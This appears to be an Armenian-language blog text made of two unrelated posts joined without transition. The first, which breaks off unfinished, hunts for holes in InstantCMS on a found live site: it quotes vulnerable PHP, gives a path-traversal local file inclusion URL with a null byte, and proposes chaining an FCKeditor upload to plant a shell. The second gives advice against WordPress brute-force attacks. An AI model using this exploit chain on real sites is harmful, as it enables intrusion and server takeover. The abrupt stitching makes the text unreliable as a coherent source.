Եվ ահա այդ շատ ցանկացողների համար էլ ստեղված է մի համակարգ (այսուհետ կանվանեմ սկրիպտ), որը կոչվում է InstantCMS: Գուցե շատերին անունը ոչինչ չասեց, բայց որոշներին հաստատ ծանոթ սկրիպտ է: Փորձեմ այսօր անդրադառնալ այս սկրիպտի թերություններին:

ՆԱԽԱՀԱՐՁԱԿՈՒՄ

Ահա գտել եմ այդ սկրիպտով աշխատող ինչ-որ կայք, որի բախտը ցավոք չի բերել: Հիմա կփորձենք ստուգել…

Առաջինը, որ աչքի ընկավ, Ադմինիստրացիոն բաժնի ակներև տեղադրություն էր` http://badsite.com/admin : Ոնց էլ չլինի, եթե ուրիշ բան չգտնեմ, էտ հաստատ ասելու բանա… Ու քանի գնում ավելի էր ձգում ինձ սկրպիտը…

Գուգլն ինձ ասաց, որ սկրիպտի պաշտոնական սայթը instantcms.ru-ն էր… Ես էլ գնացի ու … 2 Մեգաբիթանոց կապս սկրիպտը շատ արագ տեղավորեց համակարգչիս կոշտ սկավառակի ամենաակնառու տեղը` ուղիղ էկրանիս…ԻՆՁ ԿԱՆԱՉ ՃԱՆԱՊԱՐՀ

Լոկալ սերվերիս վրա միացրեցի apache-ն ու mysql-ը, սկրիպտը տեղավորեցի համապատասխան տեղում ու սկեսեցի փորփրել կոդը: Առաջինը որ տեսա ու աչքերս փայլատակեցին, դա wysiwyg անունով ֆայլերի արկղն էր (այսուհետ` ֆոլդեր), որի մեջ ինձ քաջ ծանոթ FCKeditor-ը աչքով էր անում, ասում էր “Ես այստեղ եմ…Ա~ու…”: Կհարցնեք ինչի էդքան ուրախացա, կասեմ, որ այդ editor-ն ամենալավ օգնականն է, եթե սկրիպտի մեջ լոկալ ինկլուդի թերություն կա: Ավելի մանրամասն.

http://localhost/wysiwyg/editor/filemanager/connectors/test.html

հասցեում գտնվում է ֆայլ-վերբեռնելու էջը, ու չնայած այն բանի, որ .php, .phtml, .cgi և այլ նմանատիպ ֆորմատներով ֆայլեր չենք կարողանա վերբեռնել, բայց եթե LFI-ն կա, ուրեմն ցանկացած ֆորմատի ֆայլ կարող ենք որպես php-կոդ աշխատեցնել: Բայց հակված եմ ավելի շատ ընդունել, որ նման թերությունը ոչ թե տեստավորվող սկրիպտի, այլ հենց FCKeditor-ի թերությունն է:

Ու քանի որ, ամեն ինչ աշխատում էր mod_rewrite-ով, որոշեցի .htaccess-ի մեջ քիթս խոթել մի քիչ ու գտա հետաքրքիր կոդ`

#COMPONENT "RSS FEEDS"
RewriteRule ^rss/([a-z]*)/(.*)/feed.rss$ /components/rssfeed/frontend.php?&target=$1&item_id=$2

SQL-ինյեկցիա գտնելու հույսով գնացինք ուսումնասիրելու frontend.php-ն: Ներկայացնում եմ կոդ, որը ինձ դուր եկավ առաջին հայացքից.

    if (isset($_REQUEST['do'])){ $do = $_REQUEST['do']; } else { $do = 'rss'; }
    if (isset($_REQUEST['target'])){ $target = $_REQUEST['target']; } else { die(); }
    if (isset($_REQUEST['item_id'])) { $item_id = $_REQUEST['item_id']; } else { die(); }
    .................................................. .....................................
    if ($do=='rss'){
    $rss = '';

    if (file_exists($_SERVER['DOCUMENT_ROOT'].'/components/'.$target.'/prss.php')){

    $inCore->includeFile('components/'.$target.'/prss.php');

Ուռա… $target փոփոխականը Local File Inclusion-ի հարվածի տակ ա … աչքիս… երևի…

Եթե PHP-ի կոնֆիգուրացիայի մեջ magic_quotes_gpc = off պայմանը կա, ուրեմն միանշանակ կարող ենք ցանկացաց ֆայլ ինկլուդ անել ահա այսպես`

http://localhost/components/rssfeed/frontend.php?item_id=1 &target=../../../../../../../../../../../../etc/hosts%00

Դե եթե սրա հետ մեկտեղ հիշենք մի քիչ առաջ ասածս, որ FCKeditor-ի  օգնությամբ կարող ենք վերբեռնել ֆայլը, ուրմեն SHELL-ը հաստատ կուղարկվի հոսթինգ (բայց միմիայն ցանկության դեպքում): Դե իսկ, եթե հանկարծ ադմինիստրատորը editor-ի ֆայլ վեռբեռնելու մասը անջատել է, ծայրահեղ դեպքում կոդ-ավատարը կա ու կա:

…………………..

Հոգնեցի… շարունակությունը մի քիչ հետո կգրեմ….

Նույն բրուտ-ֆորսն է, բայց կատարելագործված այն իմաստով, որ հիմա արդեն աշխատում է ոչ թե ծրագիր, այլ սկրիպտ, որը տեղադրվում է ինչ-որ սերվերի վրա և միանգամից նշանակետ է տրվում ոչ թե մեկ բլոգ, այլ բազմաթիվ բլոգներ: Այս դեպքում սկրիպտը փորձում է գաղտնաբառ գտնել բոլոր տրված բլոգների համար և տվյալները պահել բազայում:

SANS Internet Storm Center-ը նշում է, որ բրուտ-ֆորս հարձակումները մեծ տարածում ունեին մինչ այժմ, իսկ այս նոր կատարելագործված տարբերակն արդեն այլ հարթակի վրա է բարձրացնում մեթոդի վտանգավորությունը:

Իսկ ի՞նչ եմ առաջարկում ես: Եթե մինչև հիմա վտանգ կար, հիմա արդեն այդ վտանգը քառապատվել է, և ժամանակն է.

1. Որպեսզի բլոգերները իրենց բլոգների գաղտնաբառերը դարձնեն ԴԺՎԱՐ հիշվող, իմաստ չունեցող բառեր և արտահայտություններ: Ցանկալի է օգտագործել 8-ից ավելի սիմվոլներ, որտեղ կլինեն գոնե մեկ հատ մեծատառ, գոնե մեկ հատ փոքրատառ, անպայման լինեն թվեր և հատուկ նշաններ: Ավելի լավ պատկերացնելու համար բերեմ գաղտնաբառի օրինակ` Yo19agil$: Ճիշտ է, այս գաղտնաառը հիշելը դժվար է, բայց այսպիսի գաղտնաբառով Ձեր բլոգը պաշտպանելը բարձրացնում է Ձե’ր անվտանգ է:
2. Որպեսզի արգելափակեք Ձեր բլոգի ադմինիստրացիոն հատված մուտք գործելու ֆորմայում տվյալներ մուտքագրելու քանակը: Այս հարցում Ձեզ կօգնեն պլագինները, որոնցից մեկը ես կառաջարկեմ, բայց եթե ԴԵՄ ԵՔ, փնտրեք նմանատիպ պլագիններ, բայց ուշադիր եղեք, որպեսզի այն wordpress-ի կայքում միջինից բարձր վարկանիշ ունենա, այլապես հենց այդ պլագինը կարող է բաց տեղեր ունենալ: Ես առաջարկում եմ տեղադրել Limit Login Attempts պլագինը, որի ռեյտինգը 4.5 միավոր է /5 միավորից/: Թե ինչպես տեղադրել այս պլուգինը, կարդացեք այստեղ, իսկ ես մի քանի բառով ասեմ, որ այս պլուգինը թույլ է տալիս ադմինիստրացիոն հատվածից սահմանափակել փորձարկումների քանակը, մուտք գործողներին ցույց է տալիս, թե քանի տարբերակ է մնացել փորձելու համար, դե իսկ սահմանված թիվն անցնելուց հետո այդ IP-ն արգելափակվում է և Ձեզ, որպես ադմինիստրատոր, էլ.նամակ է ուղարկվում, որտեղ նշվում է, որ կայք ներխուժելու փորձեր են եղել:

Դե ինչ… այսքանը: Ապահով եղեք, պաշտպանեք Ձեր ունեցածը: